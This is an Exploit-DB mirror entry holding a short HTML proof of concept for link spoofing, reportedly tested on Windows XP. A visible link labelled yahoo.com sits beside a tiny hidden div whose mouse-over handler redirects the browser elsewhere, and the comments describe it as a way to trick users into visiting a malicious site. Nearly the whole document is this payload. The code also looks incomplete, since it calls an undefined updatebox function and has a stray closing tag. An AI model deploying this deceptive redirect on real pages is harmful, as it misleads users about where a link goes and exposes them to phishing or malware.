exploit-db-mirror/exploits/multiple/local/11561.html
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

23 lines
No EOL
540 B
HTML

# Tested on: Windows XP SP2/3
# Code :
# You can trick a user into accessing a malicious website by using
the following exploit
# The first link would be the malicious one.
<html>
<body>
<div id="mydiv"
onmouseover="document.location='http://www.youtube.com/watch?v=oHg5S
JYRHA0';"
style="position:absolute;width:2px;height:2px;background:#FFFFFF;bor
der:0px"></div>
<br>
<a href="http://www.yahoo.com" onclick="updatebox(event)"><font
style="font-family:arial;font-
size:32px">http://www.yahoo.com</font></a><br>
</div>
</body>
</html>